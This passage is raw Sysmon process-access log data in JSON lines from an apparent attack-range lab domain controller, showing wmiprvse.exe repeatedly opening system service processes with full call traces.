ystem32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5297,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B2C10200}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B2C10200}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5298,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5299,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001050C20200}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001050C20200}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5300,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B6C20200}\r\nTargetProcessId: 2156\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B6C20200}","TargetProcessId":"2156","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5301,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B5CA0200}\r\nTargetProcessId: 3160\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B5CA0200}","TargetProcessId":"3160","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5302,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B2FC0200}\r\nTargetProcessId: 3480\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B2FC0200}","TargetProcessId":"3480","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5303,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00105D830300}\r\nTargetProcessId: 4060\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00105D830300}","TargetProcessId":"4060","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+